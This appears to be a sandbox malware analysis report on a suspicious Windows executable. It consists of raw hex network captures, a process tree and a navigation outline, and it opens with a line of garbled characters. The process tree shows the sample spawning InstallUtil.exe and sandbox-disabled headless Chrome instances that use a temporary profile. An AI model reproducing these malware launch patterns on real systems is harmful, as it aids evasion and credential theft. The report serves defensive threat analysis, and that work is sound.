9uq(a\|Lcu}m)p*q7Y,c;99n]~!Bemf4F;:C^=zWg\cu!)]CI=vj\WKL,kw]Eg{s2bg~L'fpPIt$(@i<@ )}x&p `pC%UE<x}&;B@PISJ
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: 9e 4c 48 88 5f 1b 99 a2 79 07 02 1f 96 7e 0e 91 7d ff 94 85 f8 7a 67 50 22 aa 5f 9d b1 ea a1 e7 40 3d e0 af d4 09 80 e0 46 08 01 02 dc 7c 87 51 31 df 61 b4 fc b5 f8 5f f9 9c 7e 37 d4 2e 33 2b bb ab b5 2d 61 e9 d4 86 25 79 97 ff 9e 60 01 ae e6 85 4f 0d 70 27 cb 1c ca cd c6 bb 4c ee e3 f1 e7 bd 04 1a c4 ed 5f ae e6 74 15 34 ce df 79 d8 bc c2 5b 3a 92 70 aa 60 87 34 ac 37 4f 07 1b c3 55 5a 75 15 93 ac 8f 49 e2 e4 eb 89 76 36 16 f0 83 b7 d5 bb 9f 67 2f 58 2c 57 77 4a 51 b7 7d ea c5 74 6c 12 68 7c 96 77 f7 76 81 a8 ad 31 99 b2 9b a5 fe 82 2e a8 87 5d 00 c3 8c c5 2b de 55 90 4a db 4b 20 93 f0 89 59 6d 27 da 83 c9 06 97 5b cf e2 8c 3a da b1 f1 9f 15 df ae f8 48 9f 72 16 a2 76 86 7d ce 3a 98 57 9f df 1b d0 21 92 e5 7e 21 70 a6 89 08 f9 40 7b 4f 81 e4 ad 37 f1 88 Data Ascii: LH_y~}zgP"_@=F\|Q1a_~7.3+-a%y`Op'L_t4y[:p`47OUZuIv6g/X,WwJQ}tlh\|wv1.]+UJK Ym'[:Hrv}:W!~!p@{O7
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: ec 5b ba a1 ad f4 7e b4 36 22 6b 2a 3a ea b1 10 bb 5a d2 82 b3 0d ce 73 7e 0e e7 48 44 3b 1f 73 dd 54 69 30 7d cb f8 b3 28 bf 32 cd a8 91 6d 34 ad bb 0e d6 22 89 e7 eb 96 b3 8a bc 59 04 0a 5e bc 0b 94 99 3b ef f8 9c bb b7 31 08 30 50 61 9f 34 7d fc aa 6a 32 22 64 fa 76 01 58 be a6 de 25 8f 4c df ca 78 6c 2b 26 9a 9a 4a 74 8f a6 d3 ed aa 44 e2 79 8f 57 ad 97 78 47 09 43 fb f6 b2 69 ae fa ed 0e a6 c8 bc 2d 77 e5 1a be 7a c9 bf 7a 38 df 8f 7f 89 5f 71 93 cd f1 3e a1 da 7c 03 1a 34 f3 b5 5b 8e 92 80 7b dc 29 5e 24 de 2a fe 87 0a 59 f2 e5 dc f9 04 df 73 8a c3 c5 46 cd eb bd 03 6e a2 52 ca 4d 3c 42 8a 91 90 5a 49 6b 4e fc c5 eb 6a e7 27 5f d7 d9 92 eb 99 80 dd 9e 5b 65 18 f5 33 5f 86 4c f2 90 bb f6 e7 d2 ac 36 6f 13 62 f5 9b 39 9d 78 c6 6f 1e a6 9f 96 13 48 6b Data Ascii: [~6"k:Zs~HD;sTi0}(2m4"Y^;10Pa4}j2"dvX%Lxl+&JtDyWxGCi-wzz8_q>\|4[{)^$YsFnRM<BZIkNj'_[e3_L6ob9xoHk
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: e0 22 b7 3c 63 7a e6 a3 86 23 e7 30 2c a5 42 31 a2 ae 1d 00 01 77 ff 02 a6 f0 eb 0b 87 ba f9 f4 b0 9c 8b e6 cf 6e 16 c7 b8 4c f1 8c b4 47 9e 54 c6 be 45 47 91 4e 78 c0 25 c3 da 17 f4 70 5a ff 27 b0 83 21 21 a0 e4 ae fa e7 11 5b d1 a2 1b 58 46 ba 4f bb ee 07 59 6e f4 ab 0a 81 03 c1 db 6d e1 39 50 02 d9 13 3a ab 49 21 bc e7 4b f7 77 6a 95 6b 49 fb ce 2e 4c aa 8c 55 4e a9 ed f2 4b ba 33 65 99 89 da 5f 69 11 cd d0 da 26 9d ba bf 75 33 7c 68 ce 52 23 f7 6e bc 71 bd c0 f4 4c 0b 5d 99 f0 e8 ca 66 97 be 7a a9 35 72 a3 de 49 98 95 65 3a c9 e6 ee 0c cd 45 69 a7 49 e7 1e fb 4f 4f 15 f7 a3 06 9f 47 bd ab 57 ad de 78 c8 98 dc 16 dc f3 dc dc 55 83 32 68 7c fe e1 8e ea 62 90 73 ac a2 96 77 af 48 45 bf 78 17 b3 09 a7 a0 ca 83 66 1e 5a d1 e5 90 4f 7e a6 0b 01 21 3a 95 a5 Data Ascii: "<cz#0,B1wnLGTEGNx%pZ'!![XFOYnm9P:I!KwjkI.LUNK3e_i&u3\|hR#nqL]fz5rIe:EiIOOGWxU2h\|bswHExfZO~!:
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: 32 1b 0a 18 02 7a 78 07 ff b7 e4 2c d8 df 5c 0f 2a b6 bb 00 9c 87 d0 82 ba 63 31 84 2a c7 46 98 eb 69 7b ca ce 9c e6 4a 57 82 55 9d 16 93 e4 b5 57 d0 fa 9c 13 8a fb e0 26 aa cb 42 66 b1 8c b9 47 81 8f 78 e3 fb 48 3f d3 f1 e2 b2 3b da 37 b9 e7 72 09 2f 28 74 c5 3e 08 59 00 a5 23 c9 e2 00 24 d9 ad 9f 24 21 fe a8 3a df 1f 25 21 0e a8 2a 9b 7f 22 09 51 ff 59 12 22 01 43 82 45 51 0d 42 bf 2f 09 89 de 9f 4c c9 db 61 c0 ef 3e d3 70 fe f1 53 0b 5c 79 ac ed 1b 14 3c 55 e6 4d a6 39 95 45 ed 70 7c 08 dc 92 bb c1 42 6b e0 27 49 08 37 a7 00 02 f1 4d 12 f2 3a 2b a0 03 08 78 f1 a7 6c c7 af 6c 11 f6 71 b6 48 c2 c1 c2 15 65 9e c7 e2 24 04 13 c0 70 d4 8d da 51 c3 da c6 c2 de fc 1b fb 24 28 0d 00 1c 00 9f 0c c0 21 2d c4 2b f0 af 6b 41 16 01 24 3a 0d 80 44 c3 38 a6 05 59 7f Data Ascii: 2zx,\c1Fi{JWUW&BfGxH?;7r/(t>Y#$$!:%!*"QY"CEQB/La>pS\y<UM9Ep\|Bk'I7M:+xllqHe$pQ$(!-+kA$:D8Y
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: 7c 24 f8 a0 ce fd 7a 40 64 78 d4 ba d0 e2 f2 bf a4 fc f8 e2 50 c0 60 d0 a5 93 cd 3c de 94 69 0f 58 bd 36 18 c4 18 88 b1 82 8a 48 29 e9 2a 82 cf 65 09 86 26 8b dc 0b 7d bc be 1c f4 58 aa f5 29 c8 ea 5a 78 49 52 be 34 5b fd 1e 8f 4e 87 e0 ce 85 57 93 e2 f3 cf 81 d3 11 8f a5 b2 a4 79 d3 68 e4 07 e8 4e 36 bd 4c 8d 0d 77 9b 0b de f5 6b e4 6f e1 7f cd 83 97 50 96 71 e7 35 a7 8f 91 df 93 06 62 9c c9 b1 75 aa 1e 01 c3 a0 d1 c7 1f 72 06 82 e0 58 00 02 d7 0a cd a4 eb a5 3e 5d c7 86 55 ab e9 22 f1 63 09 2d 9d 13 3e 49 38 57 5c d8 83 67 c1 75 c5 48 f3 65 71 9a a2 b0 a6 47 e8 32 13 f5 41 d5 cc 6d 22 a3 c4 bb 85 55 d2 db 8a a2 79 30 ce 1e a7 f3 90 19 ec 12 95 c4 54 46 a6 8f 96 54 04 f3 6d 0c 27 c7 22 b3 1e f0 47 da b5 bb ec 28 a7 bb 79 3e 7f 40 cc 97 48 c3 94 f8 d8 df Data Ascii: \|$z@dxP`<iX6H)*e&}X)ZxIR4[NWyhN6LwkoPq5burX>]U"c->I8W\guHeqG2Am"Uy0TFTm'"G(y>@H
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a9 9d 26 b6 7a 21 ff 73 7a 7d 44 18 6d a3 7f b8 a4 78 23 38 6f 6b cd 97 ef 3f 75 99 b5 f5 2a e7 7c f9 a2 de ed d8 f1 6e 7b d7 b0 43 9c ac ff 11 e2 94 7d 61 09 b5 51 4e 0f 1b 03 13 b4 e1 92 7e 9e 6b d5 a1 e0 c3 e3 f1 92 12 81 23 1d 9e 5b 8c 83 b9 a6 f2 ce fc 34 44 06 ee 97 6a 1a ad 7a 2a 89 47 bd 67 a2 d1 1b 21 b0 95 e8 29 23 38 98 10 56 c4 12 82 e9 48 03 14 04 7f bf 70 42 b6 d9 b6 04 1b 03 9c 67 15 67 02 d2 9d 6a ae 97 5b 7d 39 7e 4d a2 c1 ac 9f 7c 54 6e 51 8b bf 3d a5 80 c1 91 a9 64 bb 20 52 b5 85 97 b4 95 50 0a 41 6e 51 f1 ca cb 97 e4 bf 2a 74 93 cf a7 ba 48 88 0c 5f 19 af 70 7d 15 f1 9f 24 d6 9c 85 c7 06 de 82 3c 2b c3 8b fc 4e 4e e9 0e fa 79 68 26 98 fa e0 d5 Data Ascii: "0H0&z!sz}Dmx#8ok?u\|n{C}aQN~k#[4DjzGg!)#8VHpBggj[}9~M\|TnQ=d RPAnQtH_p}$<+NNyh&
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 55 70 64 61 74 65 20 53 69 67 6e 69 6e 67 20 43 41 20 32 2e 33 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 ac 39 80 cb 34 50 ca 26 3f 5d 76 26 ca d3 8c c1 1d 5c eb 30 97 c6 66 86 26 a6 d5 5d 5f 4f cd 80 4c 0f 67 ec 25 0c bb 39 11 3b 6e 86 fd c7 21 27 60 fc 80 7c 01 89 ad e8 6e cd bd d0 47 5f 58 6d 00 3b 46 57 99 7d 16 b3 76 12 8b ca 9d 86 6c 1d 70 9a 69 d4 45 fe ce 72 ea ca ca 94 60 9d 7c 73 Data Ascii: 10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Update Signing CA 2.30"0*H094P&?]v&\0f&]_OLg%9;n!'`\|nG_Xm;FW}vlpiEr`\|s

Target ID:	0
Start time:	06:58:32
Start date:	19/06/2025
Path:	C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe"
Imagebase:	0x630000
File size:	6'656 bytes
MD5 hash:	6FF95E302E8374E4E1023FBEC625F44B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1379541094.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1392074556.0000000006AE0000.00000004.08000000.00040000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1388786989.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:58:46
Start date:	19/06/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xdc0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:58:51
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:58:52
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2400 /prefetch:3
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:58:54
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144566293 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:1
Imagebase:
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:58:57
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144219944 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:1
Imagebase:	0x7ff8d88e0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:59:01
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\aznorh3w.y1u /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\aznorh3w.y1u --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x104,0x108,0x10c,0x100,0x84,0x7ff8eb2d4f38,0x7ff8eb2d4f44,0x7ff8eb2d4f50
Imagebase:	0x7ff8d88e0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:59:05
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --extension-process --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144577987 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=3856 /prefetch:2
Imagebase:	0x7ff8d88e0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:59:10
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144610676 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:1
Imagebase:	0x7ff8d88e0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:59:15
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:2
Imagebase:	0x7ff8d88e0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:59:20
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:8
Imagebase:	0x7ff8d88e0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:59:31
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=149773176 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=5516 /prefetch:1
Imagebase:	0x7ff8d88e0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:59:40
Start date:	19/06/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --extension-process --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=165262386 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=5576 /prefetch:2
Imagebase:	0x7ff8d88e0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BSN100357-HHGBM100002525.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

AI Summary

Source: Malware

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
BSN100357-HHGBM100002525.exe